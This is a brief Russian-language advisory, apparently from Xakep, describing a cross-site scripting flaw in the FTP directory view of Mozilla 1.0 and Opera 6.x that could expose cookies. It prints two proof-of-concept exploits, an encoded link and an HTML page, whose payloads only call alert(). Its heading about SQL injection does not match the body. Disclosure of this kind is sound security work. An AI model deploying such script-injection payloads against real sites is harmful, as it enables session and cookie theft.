Xakep #305. Многошаговые SQL-инъекции
Обнаруженная ошибка в 'FTP view' в Mozilla и Opera позволяет вставлять произвольный код сценария, который не будет отфильтрован при просмотре содержимого FTP папки. В случае, когда
FTP сервер имеет тот же самый адрес, что и HTTP
сервер, уязвимость может использоваться для захвата чужих куки.
Эксплоит для в Mozilla:
<a href="ftp://ftp.mozilla.org/#%3C%2ftitle%3E%3Cscript%3E alert(%22exploit%22);%3C%2fscript%3E">Exploit</a>
Эксплоит для в Opera:
<html>
<head>
<META http-equiv="Refresh" content="5 ;
url=ftp://%3c%2ftitle%3e%3cscript%3e alert(%22exploit%22)%3b%3c%2fscript%3e@ftp.opera.com/">
</head>
<body>
<script>window.open("ftp://ftp.opera.com/");</script>
</body>
</html>
Уязвимость обнаружена в Opera 6.03, 6.04 и Mozilla 1.0.